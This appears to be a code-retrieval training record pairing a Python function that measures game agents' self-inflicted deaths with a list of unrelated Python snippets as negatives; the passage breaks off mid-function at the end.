def suicide_query(game_mode=0, observability=-1, game_seed=-1, agent=-1): event_id = "death" # Keep only those games within given configuration if game_seed != -1: selection = data.loc[(data['game_mode'] == game_mode) & (data['observability'] == observability) & (data['game_seed'] == game_seed)] else: selection = data.loc[(data['game_mode'] == game_mode) & (data['observability'] == observability)] if agent != -1: for index, row in selection.iterrows(): if agent not in row["agents"]: selection.drop(index, inplace=True) # print(selection.size) team_kill_count = [] ngames = 0 # Number of games in which this agent dies suicides = 0 # Number of games in which this agent commits suicide events_per_sample = [] team_kills = 0 # Iterate through selected game data for index, row in selection.iterrows(): if agent in row["agents"] and row['event_id'] == event_id: # This agent played in the game # Find its agent ID depending on its position in the agent list. There may be more than 1 agent of this # type in the game, so iterate over all and check individually. ll = row["agents"] indices = [i for i, el in enumerate(ll) if el == agent] for agent_id in indices: # teammate = (agent_id + 2) % 4 sample_event_counter = 0 for event in row["event_data"]: if event["agent_id"] == agent_id: # This agent dies if event["killer"] == agent_id: # Suicide sample_event_counter += 1 # if event["killer"] == teammate: # Killed by teammate # team_kills += 1 # if event["agent_id"] == teammate: # Teammate dies # if event["killer"] == agent_id: # Killed by this agent # team_kill_count += 1 ngames += 1 events_per_sample.append(sample_event_counter) suicides += sample_event_counter # suicide_count.append(100*suicides/ngames) # Showing percentage of game suicides # team_kill_count.append(100*team_kills/games) # percentage = 100 * suicides / ngames # mean = ngames * (percentage / 100) # variance = mean * (1 - (percentage / 100)) # std_dev = math.sqrt(variance) # std_err = std_dev / math.sqrt(ngames) # h = std_err * scipy.stats.t.ppf(1.95 / 2., ngames - 1) # 95 confidence interval # return percentage, h # print(events_per_sample) mean = suicides/ngames variance = sum([pow(x - mean, 2) for x in events_per_sample])/len(events_per_sample) std_dev = math.sqrt(variance) std_err = std_dev/math.sqrt(len(events_per_sample)) h = std_err * scipy.stats.t.ppf(1.95 / 2., ngames - 1) # 95% confidence interval return mean * 100, h * 100 # , team_kill_count
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_agent_number_of_players(players):\n return sum([count_players(player) for player in players\n if player.startswith('agent')])", "def test_winners_per_type_sum(self):\n sim = ss.Simulation()\n sim.run_simulation(14)\n winners = sim.winners_per_type()\n assert sum(winners.values()) == 14", "def get_number_of_agents(model):\n\n n_agents = len(model.schedule.agents_by_type['Customer'])\n return n_agents", "def get_number_of_investors(model):\n n_agents = len([k for k, v in model.schedule.agents_by_type['Customer'].items() if v.__class__.__name__ == 'Investor'])\n return n_agents", "def get_number_of_cheeses(self):\n number = 0\n for i in range(len(self._stools)):\n number += len(self._stools[i])\n return number", "def culggroup_thickestdonecount(As, Rps, group, dones):\n pairs = sorted(((get_culg_dimension(As, Rps, l), dones[l], l)\n for l in group),\n reverse=True)\n count = len(tuple(itt.takewhile(lambda p: p[1], pairs)))\n return count", "def CountSuits(hand):\r\n numtrump = 0\r\n numss = 0\r\n numos1 = 0\r\n numos2 = 0\r\n\r\n for card in hand:\r\n if card < 7:\r\n numtrump += 1\r\n elif card < 12:\r\n numss += 1\r\n elif card < 18:\r\n numos1 += 1\r\n else:\r\n numos2 += 1\r\n \r\n numsuits = 0\r\n if numtrump != 0:\r\n numsuits += 1\r\n if numss != 0:\r\n numsuits += 1\r\n if numos1 != 0:\r\n numsuits += 1\r\n if numos2 != 0:\r\n numsuits += 1\r\n return [numtrump,numss,numos1,numos2,numsuits]", "def EmpiricalValues(deals):\n global noOfFaceUpCardsPerGame, noOfLegalActionsPerGame\n noOfFaceUpCardsPerGame = []\n noOfLegalActionsPerGame = []\n\n for i in range(deals):\n print(\"\\n\\nDeal %d\" % i)\n newGame = Game()\n firstPlayer = newGame.firstPlayer() # choosing randomly the first player\n\n if firstPlayer == \"player\" :\n dealer = newGame.computer\n else:\n dealer = newGame.player\n\n tableCanBeSwept = newGame.checkIfInitialTableCanBeSwept()\n\n if tableCanBeSwept:\n newGame.sweepTheTable(dealer)\n\n newGame.run(firstPlayer)\n\n noOfFaceUpCardsPerGame.append(newGame.noOfFaceUpCardsPerPlay) # this stores the number of face up cards per play\n noOfLegalActionsPerGame.append(newGame.noOfLegalActionsPerPlay) # this stores the number of legal actions per play\n\n print_stats(deals, noOfFaceUpCardsPerGame, noOfLegalActionsPerGame)", "def sixes(dice):\n return sum([x for x in dice if x == 6])", "def get_suits(hand, board):\n suits = {}\n for card in hand + board:\n if card[1] in suits:\n suits[card[1]] += 1\n else:\n suits[card[1]] = 1\n return suits", "def countModes(self,l_edges):\n\n\t\tassert l_edges is not None\n\n\t\t#Determine the multipole values of each bin in the FFT grid\n\t\tell = self.getEll()\n\n\t\t#Count how many of these pixels fall inside each bin\n\t\tmodes_on = ell[None] < l_edges[:,None,None]\n\t\tmodes_ly_0 = modes_on.copy()\n\t\tmodes_ly_0[:,:,1:] = 0\n\n\t\t#Count the total number of modes, and the number of modes with ly=0 \n\t\tnum_modes = np.diff(modes_on.sum((1,2)).astype(np.float))\n\t\tnum_modes_ly_0 = np.diff(modes_ly_0.sum((1,2)).astype(np.float))\n\n\t\t#Return the corrected number of modes that yields the right variance in the Gaussian case\n\t\treturn num_modes**2/(num_modes+num_modes_ly_0)", "def count_genotypes(genotypeList,StateGenPosData, x, y):\r\n allMos = 0\r\n nonEggs = 0\r\n Adults = 0\r\n for i in range(len(genotypeList)):\r\n gt = genotypeList[i]\r\n b = sum(1 for item in StateGenPosData if not 'new' in item[0] and not 'gestating' in item[0] and gt in item[1] and item[2]==(x,y))\r\n c = sum(1 for item in StateGenPosData if 'adult' in item[0] and 'XX' in item[1] and not 'gestating' in item[0] and gt in item[1] and item[2]==(x,y))\r\n d = sum(1 for item in StateGenPosData if 'adult' in item[0] and gt in item[1] and item[2]==(x,y))\r\n## for item in StateGenPosData:\r\n## print(item[0],item[1],item[2])\r\n## if 'adult' in item[0] and gt in item[1] and item[2]==(x,y):\r\n## d+=1\r\n## print('yay')\r\n## if not 'new' in item[0] and not 'egg' in item[0] and not 'gestating' in item[0] and gt in item[1] and item[2]==(x,y):\r\n## c+=1\r\n## if not 'new' in item[0] and not 'gestating' in item[0] and gt in item[1] and item[2]==(x,y):\r\n## b+=1\r\n allMos = allMos + b\r\n nonEggs = nonEggs + c\r\n Adults = Adults + d\r\n return allMos, nonEggs, Adults", "def get_number_of_char_sponsors(model):\n n_agents = len([k for k, v in model.schedule.agents_by_type['Customer'].items() if v.__class__.__name__ == 'CharitableSponsor'])\n return n_agents", "def get_agent_count(self, i: int, j: int, dist: str = 'current') -> int:\n return int(self._dist[dist][i, j] / self._param['size_fraction'])", "def op_count(cls, crawler, stage=None):\n if stage:\n total_ops = cls.conn.get(make_key(crawler, stage))\n else:\n total_ops = cls.conn.get(make_key(crawler, \"total_ops\"))\n return unpack_int(total_ops)", "def gal_count(clusters):\n sum = 0\n for x in clusters:\n sum += x.ngal\n return sum", "def agent_count(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"agent_count\")", "def run_tournament_(genes):\n\n n_genes = len(genes)\n scores = np.zeros(n_genes, dtype=np.uint32)\n for i, j in itertools.combinations(range(n_genes), 2):\n s_i, s_j = run_duel(genes[i], genes[j])\n scores[i] += s_i\n scores[j] += s_j\n continue\n\n return scores / (n_genes - 1)", "def clairvoyant_agent(self, seeds): \n rewards = []\n for seed in seeds:\n self.env.seed(seed)\n self.env.reset()\n\n # store the initial generation levels\n initial_action = [self.env.state.generator_1_level, self.env.state.generator_2_level]\n\n while not self.env.state.is_done():\n # repeat constant action, just in order to get to the end\n self.env.step(initial_action)\n # read realised demand\n realised_demand = np.diagonal(np.array(env.state.agent_predictions_all))\n # optimise the run cost against (clairvoyant) realised demand, pretending to run at t=-1\n min_cost = agent.full_solution([-1] + initial_action + list(realised_demand))\n # collect (negative) cost\n rewards.append(- min_cost)\n return np.mean(rewards)", "def count_sheeps(sheep):\n return sheep.count(True)", "def compute_player_score():\n\n progress_bar = ProgressBar(label=\"Computing universes\")\n\n survivals_count = 0\n for i in range(PARALLEL_UNIVERSES_COUNT):\n if simulate_universe():\n survivals_count += 1\n progress_bar.set_progression((i + 1) / PARALLEL_UNIVERSES_COUNT)\n\n progress_bar.end(\"\\n\\n\")\n\n return survivals_count / PARALLEL_UNIVERSES_COUNT", "def count_gates(qobj, basis, qubits):\n\n #TO DO\n pass", "def hives_count(self) -> int:\n return self.hives.count()", "def choose_target(self, agents):\n\n number_of_suspects = [0]*(len(agents))\n number_of_suspects_per_agent = []\n\n index = 0\n for a1 in agents:\n if not a1.is_impostor():\n for a2 in agents:\n if self.km.suspects(a1.agent_id, a2.agent_id):\n number_of_suspects[index] = number_of_suspects[index] + 1\n else:\n number_of_suspects[index] = 999999\n number_of_suspects_per_agent.append((a1.agent_id,number_of_suspects[index]))\n index = index + 1\n\n self.target = min(number_of_suspects_per_agent, key = lambda t: t[1])[0]", "def assess_progress():\n\tconn = pymongo.Connection(MASTER_SERVER)\n\tdb = conn.SocialLearning\n\tdb.authenticate(MONGO_USER, MONGO_PASSWORD)\n\n\tcoll_names = db.collection_names()\n\n\tresult = {}\n\n\tfor m in modes:\n\t\tresult[m[0]] = [0]*MAX_DEMES\n\t\tfor subm in [c for c in coll_names if c.startswith('gp_ '+m[0])]:\n\t\t\tidx = int(subm[4 + len(m[0]):])\n\t\t\tif idx < MAX_DEMES:\n\t\t\t\tcoll = db[subm]\n\t\t\t\tresult[m[0]][idx] = coll.count()\n\n\treturn result", "def winners_per_type(self):\n winners = [winner[1] for winner in self.result]\n # making a list of the type of winners\n return Counter(winners)\n # Using the Counter tool from the standard library to count the\n # types in a dictionary", "def synergy_counter_role(A_side, B_side, A_ban = [], B_ban = []):\n \n #Decide which team\n if len(A_side)%2 == 0 or (len(A_side)%2 == 1 and len(B_side) > len(A_side)):\n team_side = \"A\"\n print(\"AI is on A Side\")\n my_team = A_side\n enemy_team = B_side\n else:\n team_side = \"B\"\n my_team = B_side\n enemy_team = A_side\n print(\"AI is on B Side\")\n \n #Role accounting \n team_roles = {\"Carry\" : 3, \"Captain\" : 1, \"Jungler\" : 1}\n for name in my_team:\n data = [hero for hero in API_rates if hero['name'] == name]\n roles = data[0][\"roles\"]\n for role in roles: \n team_roles[role] -= 1/len(roles)\n print(team_roles)\n\n candidates = []\n #Obtain eligible candidates by roles\n for hero in API_rates:\n if (hero[\"name\"] in A_side) or (hero[\"name\"] in B_side) or (hero[\"name\"] in A_ban) or (hero[\"name\"] in B_ban) :\n pass\n else:\n for role in hero[\"roles\"]:\n if team_roles[role] > 0:\n candidates.append(hero[\"name\"])\n break\n else:\n pass \n \n nominees = get_nominees(candidates, my_team, enemy_team)\n return nominees[0][\"name\"]", "def agentCounter(gameState, index, depth):\n if index == gameState.getNumAgents():\n return [depth-1, 0]\n else:\n return [depth, index]", "def count_choices(self) -> dict:\r\n times_chosen = dict()\r\n\r\n # exclude the optimistic value when counting choices\r\n for arm, values in self.rewards.items():\r\n if self.optim_c not in values:\r\n times_chosen[arm] = len(values)\r\n else:\r\n times_chosen[arm] = 0\r\n\r\n return times_chosen", "def _choose_clusters_num(database_type: str, synthetic_data_dim: int) -> int:\n data_dim: int = 1\n if database_type == DatabaseType.Synthetic:\n data_dim = synthetic_data_dim\n elif database_type in [DatabaseType.ThreeDRoadNetwork, DatabaseType.IndividualHouseholdElectricPowerConsumption]:\n data_dim = 2\n elif database_type == DatabaseType.HouseSalesInKingCounty:\n data_dim = 8\n return 2 * (data_dim + 1) ** 2 + 2", "def get_num_of_states_and_facts(self):\n\n public_predicates = {}\n private_predicates = {}\n sum_of_facts = 0\n\n for domain in self._domains:\n\n problem = list(filter(lambda prob: prob.domain == domain.name, self._problems))[0]\n last_index = problem.name.rfind('-')\n agent_name = problem.name[last_index + 1:]\n\n for predicate in domain.predicates:\n\n predicate_has_private_arg = False\n arg_types = list(map(lambda arg: Agent.get_all_subtypes(arg.type, domain.type_hierarchy),\n predicate.args))\n ordered_objs = []\n\n # go over each arg type (type of first param, second param ...)\n for possible_types in arg_types:\n objs_of_subtype = []\n\n # for each arg add all the types it can be as a list of types\n for type in possible_types:\n if problem.objects.__contains__(type):\n if problem.objects[type][0].private:\n predicate_has_private_arg = True\n objs_of_subtype += problem.objects[type]\n\n ordered_objs.append(objs_of_subtype)\n\n param_combinations = list(itertools.product(*ordered_objs))\n\n if (predicate.is_private or predicate_has_private_arg) and predicate.name not in private_predicates:\n private_predicates[predicate.name + '-' + agent_name] = len(param_combinations)\n sum_of_facts += len(param_combinations)\n elif predicate.name not in public_predicates:\n public_predicates[predicate.name] = len(param_combinations)\n sum_of_facts += len(param_combinations)\n\n total_assignments = list(public_predicates.values()) + list(private_predicates.values())\n num_of_states = reduce(lambda a, b: a * b, total_assignments, 1)\n return num_of_states, sum_of_facts", "def count_vario(dist_param, picker_param):\n orig = '/home/zby/MAGISTERKA/MGR/results/oryginal.clustered.t'\n cl_orig = read_clustered(orig)\n name_tag = ''\n ndist = dist_param[1:]\n npick = picker_param[1:]\n for index in drange(5, 20, 0.5):\n name_tag = \"{}_{}_{}\".format(index, npick, ndist)\n try:\n clust2 = read_clustered(tfidf_name('merged.stem{}.stop.clustered.t', name_tag))\n except:\n print(\"no data for {}\".format(name_tag))\n continue\n var, norm = variation_of_information(cl_orig, clust2)\n print(\" {} VOI is {}\".format(name_tag, norm))", "def per_cell_animal_count(self):\n print self.island.individuals()", "def _number_states_in_pclass(n_modes, pclass):\n out = fact(n_modes) / fact(n_modes - len(pclass))\n out /= _compute_mu_factor2(_lengths_groupings(pclass))\n return out.astype(int)", "def get_aggregated_possession_stats_for_entity_type(self, entity_type):\n entity_type = entity_type.lower()\n if entity_type not in ['team', 'opponent', 'player', 'lineup', 'lineupopponent']:\n return None\n if entity_type in ['team', 'opponent']:\n aggregate_stats = {self.HomeTeamId: defaultdict(int), self.VisitorTeamId: defaultdict(int)}\n else:\n aggregate_stats = {self.HomeTeamId: defaultdict(lambda: defaultdict(int)), self.VisitorTeamId: defaultdict(lambda: defaultdict(int))}\n for period in self.Periods:\n for possession in period.Possessions:\n for team_id in possession.PlayerStats.keys():\n for lineup_id in possession.PlayerStats[team_id].keys():\n for opponent_lineup_id in possession.PlayerStats[team_id][lineup_id].keys():\n for player_id in possession.PlayerStats[team_id][lineup_id][opponent_lineup_id].keys():\n for stat_key in possession.PlayerStats[team_id][lineup_id][opponent_lineup_id][player_id].keys():\n stat_value = possession.PlayerStats[team_id][lineup_id][opponent_lineup_id][player_id][stat_key]\n if entity_type == 'team':\n aggregate_stats[team_id][stat_key] += stat_value\n elif entity_type == 'opponent':\n opponent_team_id = utils.swap_team_id_for_game(team_id, [self.HomeTeamId, self.VisitorTeamId])\n aggregate_stats[opponent_team_id][stat_key] += stat_value\n elif entity_type == 'player':\n aggregate_stats[team_id][player_id][stat_key] += stat_value\n elif entity_type == 'lineup':\n aggregate_stats[team_id][lineup_id][stat_key] += stat_value\n elif entity_type == 'lineupopponent':\n opponent_team_id = utils.swap_team_id_for_game(team_id, [self.HomeTeamId, self.VisitorTeamId])\n aggregate_stats[opponent_team_id][opponent_lineup_id][stat_key] += stat_value\n\n # since stat keys are summed up from player stats team and lineup stats will need some stats to be divided by 5\n if entity_type in ['team', 'opponent']:\n for team_id in aggregate_stats.keys():\n for stat_key in aggregate_stats[team_id].keys():\n if stat_key in pbpstats.KEYS_OFF_BY_FACTOR_OF_5_WHEN_AGGREGATING_FOR_TEAM_AND_LINEUPS:\n aggregate_stats[team_id][stat_key] = aggregate_stats[team_id][stat_key] / 5\n\n if entity_type in ['lineup', 'lineupopponent']:\n for team_id in aggregate_stats.keys():\n for lineup_id in aggregate_stats[team_id].keys():\n for stat_key in aggregate_stats[team_id][lineup_id].keys():\n if stat_key in pbpstats.KEYS_OFF_BY_FACTOR_OF_5_WHEN_AGGREGATING_FOR_TEAM_AND_LINEUPS:\n aggregate_stats[team_id][lineup_id][stat_key] = aggregate_stats[team_id][lineup_id][stat_key] / 5\n\n return aggregate_stats", "def culggroup_donecount(group, dones):\n return sum(dones[l] for l in group)", "def prepare_count_incidents(self, object):\n roles = object.actorrole_set.all()\n return Incident.objects.filter(actors_role__in=roles).count()", "def N(self):\n return len(self.cavity_grid.cavities) + 1", "def num_species_on_map(self):\n # tot_herbivores = 0\n # tot_carnivores = 0\n # for cells in itertools.chain.from_iterable(self.map):\n # curr_herbivore, curr_carnivore = cells.num_species_per_cell()\n # tot_herbivores += curr_herbivore\n # tot_carnivores += curr_carnivore\n\n return (sum(x) for x in zip(*[cells.num_species_per_cell() for cells in itertools.chain.from_iterable(self.map)]))\n\n # (sum(x) for x in zip(*[cells.num_species_per_cell() for cells in itertools.chain.from_iterable(self.map)]))", "def number_of_constituents(bc_class):\n num_trn = 0\n cn = bc_class.constituent_properties\n if cn.salinity:\n num_trn += 1\n if cn.temperature:\n num_trn += 1\n if cn.vorticity:\n num_trn += 1\n if not cn.general_constituents.empty:\n num_trn += len(cn.general_constituents.index)\n if not cn.sand.empty:\n num_trn += len(cn.sand.index)\n if not cn.clay.empty:\n num_trn += len(cn.clay.index)\n return num_trn", "def resultCounter(detections):\n counter = 0\n for attribute, value in classIterator(detections):\n if 'crease' in attribute:\n counter += len(value)\n return counter", "def num_injectors(self):\n injectors = self.info_wells.groupby('well_type').get_group('inj')\n return injectors['well'].nunique()", "def get_number_of_atoms_to_optimize(self):\n v = self.c.get(simulation_cell=True)\n return len(v.data.stoichiometry)", "def test_counter_agent(self):\n config = {\n 'name': 'CounterAgent',\n 'network_params': {\n 'path': join(ROOT, 'test.gexf')\n },\n 'agent_type': 'CounterModel',\n 'states': [{'times': 10}, {'times': 20}],\n 'max_time': 2,\n 'num_trials': 1,\n 'environment_params': {\n }\n }\n s = simulation.from_config(config)\n env = s.run_simulation(dry_run=True)[0]\n assert env.get_agent(0)['times', 0] == 11\n assert env.get_agent(0)['times', 1] == 12\n assert env.get_agent(1)['times', 0] == 21\n assert env.get_agent(1)['times', 1] == 22", "def count_players(definition):\n _, player_definition = parse_player_definition(definition)\n return (int(player_definition['left_players']) +\n int(player_definition['right_players']))", "def aggregate_results(results):\n\n for (config,con,dec),folds in results.iteritems():\n m = MODEL_PATTERN.match(config)\n if m:\n mode = m.groupdict()['mode'] # mle, rl, mrt, ...\n model = m.groupdict()['model'] # haem, hacm, hard, ...\n align = m.groupdict()['align'] # crp, cls ...\n else:\n mode, model, align = '', '', ''\n # mean accuracies across seeds for each fold\n foldaccuracies = []\n # we count number of models over folds and seeds\n num_individual_models = 0\n\n for foldname,fold in folds.items():\n if 'Q' in options.mode:\n seedaccurracies = fold.values()[:1] if fold.values() else [] # pick one\n# SUPPORT_STATISTICS[(config,con,dec,model,align,mode,foldname)] += 1\n else:\n seedaccurracies = []\n for seed_acc in fold.values():\n seedaccurracies.append(seed_acc)\n SUPPORT_STATISTICS[(config,con,dec,model,align,mode,foldname)] += 1\n # aggregate on fold level\n fold['__MEAN__'] = float(np.mean(seedaccurracies))\n fold['__SD__'] = float(np.std(seedaccurracies))\n l = len(seedaccurracies)\n num_individual_models += l\n SUPPORT_STATISTICS[(config,con,dec,model,align,mode,'__MEAN__')] += l\n SUPPORT_STATISTICS[(config,con,dec,model,align,mode,'__SD__')] += l\n\n # statistics over seeds for this fold\n fold['__STATS__'] = fold['__MEAN__'], fold['__SD__'], l\n foldaccuracies.append(fold['__MEAN__'])\n # aggregate on (config, condition, decoding) level\n folds['__MEAN__'] = float(np.mean(foldaccuracies))\n folds['__SD__'] = float(np.std(foldaccuracies))\n # statistics over folds for this (config, condition, decoding)\n folds['__STATS__'] = folds['__MEAN__'], folds['__SD__'], num_individual_models", "def count():", "def AnalyzeOrg(org_details, env_details, skip_traits = []):\n max_phen_score = len(env_details) - len(skip_traits)\n phenotype_score = 0\n for trait in env_details:\n if trait in skip_traits: continue\n trait_name = trait_map[trait].lower()\n expression = org_details[trait_name]\n if expression == \"1\" and env_details[trait] == \"1\": # True positive (+1)\n phenotype_score += 1\n elif expression == \"0\" and env_details[trait] == \"-1\": # True negative (+1)\n phenotype_score += 1\n elif expression == \"1\" and env_details[trait] == \"-1\": # False positive (-1)\n phenotype_score -= 1\n elif expression == \"0\" and env_details[trait] == \"1\": # False negative (-1)\n phenotype_score -= 1\n else:\n print \"Unexpected expression/environment case!\"\n exit(-1)\n return {\"max_score\": max_phen_score, \"score\": phenotype_score}", "def eval_randoms(count):\n\t\tfor person in Simulation.community:\n\t\t\tSimulation.community[person].eval_random_strategy(count)", "def runcount(test_keys, sigma, sigma_max, sigma_step,\n npoints_min, npoints_max, npoints_step):\n run = 1\n for key in test_keys:\n if key:\n while sigma < sigma_max:\n npoints = npoints_min\n while npoints < npoints_max:\n npoints += npoints_step\n run += 1\n sigma += sigma_step\n return run", "def simulate_counts(self, C, seed=None, reverse=False, **contract_opts):\n p_dense = self.to_dense(reverse=reverse, **contract_opts)\n return qu.simulate_counts(p_dense, C=C, seed=seed)", "def how_many(cls):\n print(\"We have {:d} robots.\".format(cls.population))", "def how_many(cls):\n print(\"We have {:d} robots.\".format(cls.population))", "def chance(dice):\n return sum(dice)", "def count_anyone_answered(group: list) -> int:\n return len(functools.reduce(lambda a, b : a + b, [collections.Counter(answers) for answers in group]))", "def count_amenity(src_points, candidates, rad):\n # Create tree from the candidate points\n tree = BallTree(candidates, leaf_size=15, metric='haversine')\n\n # Get distance and index of nearest amenity\n dist, nearest_ind = tree.query(src_points, k=1)\n\n dist = dist * 6371000\n # Count number of amenity within radius\n count = tree.query_radius(src_points, r=rad, count_only=True)\n # Get indexes of all the amenity within radius\n all_ind = tree.query_radius(src_points, r=rad)\n\n return count, dist.ravel(), nearest_ind, all_ind\n\n # Return the number of schools within the distance for each apartment wrt sale date", "def take_attendance():\n\t\tcount = 0\n\t\tfor person in Simulation.community:\n\t\t\tif Simulation.community[person].went_to_bar():\n\t\t\t\tcount += 1\n\t\tprint(count)\n\t\tStrategy.evalScore(count)\n\t\tSimulation.eval_randoms(count)\n\t\tSimulation.add_to_memory(count)", "def nmodes(self):\n if self.mode_selection is not None:\n return len(self.mode_selection)\n else:\n return len(self.mol.normal_modes.modes.freqs)", "def count(self, cp, min_surf, max_price, ad_type, nb_room_min):\n _cp = []\n if type(cp) is list:\n for c in cp:\n _cp.append(self.get_location(c))\n else:\n _cp.append(get_location(cp))\n \n SEARCH_PAYLOAD = [\n {\n \"includeNewConstructions\": True,\n \"inseeCodes\": _cp,\n \"maximumPrice\": max_price,\n \"minimumLivingArea\": min_surf,\n \"realtyTypes\": 3,\n \"rooms\": range(nb_room_min, 5),\n \"transactionType\": self._map_type(ad_type)\n },\n ]\n \n COUNT_URL = \"https://api-seloger.svc.groupe-seloger.com/api/v1/listings/count\"\n \n r = requests.post(COUNT_URL, data=json.dumps(SEARCH_PAYLOAD), headers=self.headers)\n return r.json()[0]", "def organismsCount(self) -> int:\n return self.group.organismsCount", "def _collect_counts(self):\n for t in self.system.keys():\n if t in self.gold:\n self.tp += 1\n else:\n self.fp += 1\n for t in self.gold.keys():\n if t not in self.system:\n self.fn += 1", "def venue_size(venue):\n if venue == \"ws\":\n return 100\n elif venue in [\"acl\", \"aacl\", \"naacl\", \"emnlp\", \"coling\", \"lrec\"]:\n return 50\n else:\n return 1", "def get_population(self):\n population = 0\n for i in self:\n population += i.count(self.cell_state['alive'])\n return population", "def count_amino_acids(self):\n n = 0\n for chain in self.iter_chains():\n n += chain.count_amino_acids()\n return n", "def appearances(size, target):\n appears = 0\n for i in range(1, size + 1):\n for j in range(1, size + 1):\n if i * j == target:\n appears += 1\n return appears", "def get_number_of_ions(exp_builder, phase, system_id):\n # Read in output pdb file to read ionic strength.\n if phase == 'complex' or phase == 'solvent1':\n phase_id = 0\n else:\n phase_id = 1\n system_filepath = exp_builder._db.get_system_files_paths(system_id)[phase_id].position_path\n system_filepath = os.path.splitext(system_filepath)[0] + '.pdb'\n system_traj = mdtraj.load(system_filepath)\n\n # Count number of waters and ions.\n n_waters = 0\n n_pos_ions = 0\n n_neg_ions = 0\n for res in system_traj.topology.residues:\n if res.is_water:\n n_waters += 1\n elif '+' in res.name:\n n_pos_ions += 1\n elif '-' in res.name:\n n_neg_ions += 1\n\n # Verify that number of ions roughly models the expected ionic strength.\n try:\n solvent_id = exp_builder._db.systems[system_id]['solvent']\n except KeyError:\n solvent_id = exp_builder._db.systems[system_id][phase] # solvent1 or solvent2\n ionic_strength = exp_builder._db.solvents[solvent_id]['ionic_strength']\n n_ionic_strength_ions = int(np.round(n_waters * ionic_strength / (55.41*unit.molar)))\n\n return n_pos_ions, n_neg_ions, n_ionic_strength_ions", "def get_n_owned_games(file_size):\n df = pd.read_csv('Resources/formateddataset{0}.csv.gz'.format(file_size), compression='gzip', usecols=['steamid', 'rating'])\n nGames = df[(df.rating == 1.0)].groupby(by=['steamid']).rating.count().reset_index()\n nGames.columns = ['steamid', 'nGames']\n return(nGames)", "def update_mean_and_count(self, strat_profile, game_outcome):\n self.total_interactions += 1\n for k in range(self.G.n_players):\n self.mu[k][strat_profile] *= self.count[k][strat_profile]\n self.mu[k][strat_profile] += game_outcome[k]\n self.count[k][strat_profile] += 1\n self.mu[k][strat_profile] /= self.count[k][strat_profile]\n\n for s in self.V:\n self.count_history[s].append(self.count[0][s] /\n float(self.total_interactions))", "def get_number_of_ver_sponsors(model):\n n_agents = len([k for k, v in model.schedule.agents_by_type['Customer'].items() if v.__class__.__name__ == 'VerificationSponsor'])\n return n_agents", "def enrollment_counts(cls, course_id):\r\n # Unfortunately, Django's \"group by\"-style queries look super-awkward\r\n query = use_read_replica_if_available(cls.objects.filter(course_id=course_id, is_active=True).values('mode').order_by().annotate(Count('mode')))\r\n total = 0\r\n d = defaultdict(int)\r\n for item in query:\r\n d[item['mode']] = item['mode__count']\r\n total += item['mode__count']\r\n d['total'] = total\r\n return d", "def amine(listAmine, count):\n \n for type in listAmine.keys():\n for nitrogen in listAmine[type]:\n nbNeighbor = numberNeigthbor(nitrogen[\"neighbors\"])\n for neighbor in nitrogen[\"neighbors\"]:\n if not nbNeighbor in count[type].keys():\n count[type][nbNeighbor] = structure.countElements()\n if not nbNeighbor in count[\"GlobalAmine\"].keys():\n count[\"GlobalAmine\"][nbNeighbor] = structure.countElements()\n\n\n if neighbor[\"element\"] in count[type][nbNeighbor].keys():\n count[type][nbNeighbor][neighbor[\"element\"]] = count[type][nbNeighbor][neighbor[\"element\"]] + 1\n count[\"GlobalAmine\"][nbNeighbor][neighbor[\"element\"]] = count[\"GlobalAmine\"][nbNeighbor][neighbor[\"element\"]] + 1\n\n else:\n count[type][nbNeighbor][\"others\"] = count[type][nbNeighbor][\"others\"] + 1\n count[\"GlobalAmine\"][nbNeighbor][\"others\"] = count[\"GlobalAmine\"][nbNeighbor][\"others\"] + 1", "def total_occupancy_modifier(frame, data):\n\n occupancies = data.particles['Occupancy'][...]\n site_type = data.particles['Particle Type'][...]\n num_site_types = occupancies.shape[1] #Accessing the number of columns in the Occupancy matrix\n total_occupancy = np.sum(occupancies, axis=1) #Summing over all columns\n # NOTE By convention, the first half of types is Si, the second half is C\n is_si_site = site_type <= num_site_types//2\n is_c_site = site_type > num_site_types//2\n si_occupancy = np.sum(occupancies[:, :(num_site_types//2)], axis=1)\n c_occupancy = np.sum(occupancies[:, (num_site_types//2):], axis=1)\n data.particles_.create_property('Total Occupancy', data=total_occupancy.astype(int))\n data.particles_.create_property('Is Si Site', data=is_si_site.astype(int))\n data.particles_.create_property('Is C Site', data=is_c_site.astype(int))\n data.particles_.create_property('Si Occupancy', data=si_occupancy.astype(int))\n data.particles_.create_property('C Occupancy', data=c_occupancy.astype(int))", "def AnalyzeOrgSimple(org_details, env_details, skip_traits = []):\n max_phen_score = len(env_details) - len(skip_traits)\n phenotype_score = 0\n for trait in env_details:\n if trait in skip_traits: continue\n trait_name = trait_map[trait].lower()\n expression = org_details[trait_name]\n if expression == \"1\" and env_details[trait] == \"1\": # True positive (+1)\n phenotype_score += 1\n elif expression == \"1\" and env_details[trait] == \"-1\": # False positive (-1)\n phenotype_score -= 1\n return {\"max_score\": max_phen_score, \"score\": phenotype_score}", "def of_a_kind_size(dice_list):\n return max([dice_list.count(value) for value in range(1,7)])", "def get_abundance_of_agent(self, query_agent) -> int:\n if type(query_agent) is not KappaAgent:\n query_agent = KappaAgent(query_agent)\n abundance = 0\n for cx, cx_ab in self.get_all_complexes_and_abundances():\n intra_cx_ab = cx.get_number_of_embeddings_of_agent(query_agent)\n abundance += intra_cx_ab * cx_ab\n return abundance", "def heuristic(self, state: ODState) -> int:\n h = 0\n if self.assigned_goals is None:\n for agent in state.new_agents:\n h += self.grid.get_heuristic(agent.coords, agent.color)\n for j in range(len(state.new_agents), len(state.agents)):\n h += self.grid.get_heuristic(state.agents[j].coords, state.agents[j].color)\n else:\n for agent in state.new_agents:\n h += self.grid.get_heuristic(agent.coords, self.assigned_goals[agent.id])\n for j in range(len(state.new_agents), len(state.agents)):\n h += self.grid.get_heuristic(state.agents[j].coords, self.assigned_goals[state.agents[j].id])\n return h", "def run_tournament(agents, randomize_round_num=True):\r\n\r\n for a in agents:\r\n try:\r\n a.load_payoff_conditions(payoffs)\r\n except Exception as e:\r\n pass\r\n\r\n score_dict = {}\r\n\r\n for a in agents:\r\n score_dict[a.name] = 0\r\n\r\n for (a1, a2) in itertools.product(agents, agents):\r\n\r\n if randomize_round_num:\r\n match_rounds = random.randint(min_rounds, max_rounds)\r\n else:\r\n match_rounds = rounds\r\n\r\n (a1_score, a2_score) = run_match(a1, a2, match_rounds, payoffs)\r\n\r\n score_dict[a1.name] += a1_score\r\n score_dict[a2.name] += a2_score\r\n\r\n return score_dict", "def observed_species(counts):\n return (counts!=0).sum()", "def evaluate(env, agent, 